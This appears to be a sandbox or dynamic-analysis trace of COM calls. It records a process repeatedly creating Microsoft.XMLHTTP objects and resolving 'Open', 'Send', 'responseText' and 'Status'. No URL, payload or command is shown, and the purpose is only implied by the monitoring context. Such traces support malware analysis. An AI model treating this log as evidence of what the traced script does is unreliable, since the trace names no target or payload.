	[0947.321] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7240, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7240) returned 0x0
	[0947.321] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7240) returned 0x3
	[0947.321] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7240, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0947.321] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7240, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0947.322] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7240, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0947.322] longjmp () 
	[0947.322] longjmp () 
	[0947.322] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0947.322] SysStringLen (param_1=0x0) returned 0x0
	[0947.322] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0947.322] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0947.322] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0947.322] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0947.322] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0947.322] ??2@YAPEAX_K@Z () returned 0x62f310
	[0947.322] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0947.322] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0947.322] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0947.322] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0947.322] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0947.323] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0947.323] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0947.323] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0947.323] longjmp () 
	[0947.323] longjmp () 
	[0947.323] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0947.323] SysStringLen (param_1=0x0) returned 0x0
	[0947.323] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0947.323] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0947.323] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0947.323] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0947.323] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0947.323] ??2@YAPEAX_K@Z () returned 0x62f330
	[0947.324] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f330) 
	[0947.324] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0947.324] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0947.324] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0947.324] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0947.324] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0947.324] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0947.324] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0947.324] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0947.324] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0947.324] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0948.814] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0948.814] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0948.814] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0948.814] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0948.814] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0948.815] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0959.575] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0959.575] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0959.575] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0959.576] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0959.576] SysStringLen (param_1=0x0) returned 0x0
	[0959.576] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0959.577] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0959.577] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0959.577] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0959.577] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0959.577] ??2@YAPEAX_K@Z () returned 0x62f330
	[0959.577] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f330) 
	[0959.577] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0959.577] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0959.577] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0959.577] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0959.577] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0959.577] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0959.579] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0959.580] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0959.580] SysStringLen (param_1=0x0) returned 0x0
	[0959.580] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0959.580] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0959.580] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7510) returned 0x0
	[0959.580] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0959.580] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0959.580] ??2@YAPEAX_K@Z () returned 0x62f310
	[0959.580] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f310) 
	[0959.580] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0959.580] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
	[0959.580] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7510) returned 0x0
	[0959.580] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7510) returned 0x3
	[0959.580] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0959.580] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7510, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0959.580] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0959.581] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0959.581] SysStringLen (param_1=0x0) returned 0x0
	[0959.581] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0959.581] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0959.581] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0959.581] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0959.581] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7328) returned 0x0
	[0959.581] ??2@YAPEAX_K@Z () returned 0x62f330
	[0959.581] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7328, pUnkSite=0x62f330) 
	[0959.581] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0959.581] XMLHTTPRequest:IUnknown:Release (This=0x49c7328) returned 0x0
	[0959.581] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0959.581] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0959.581] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
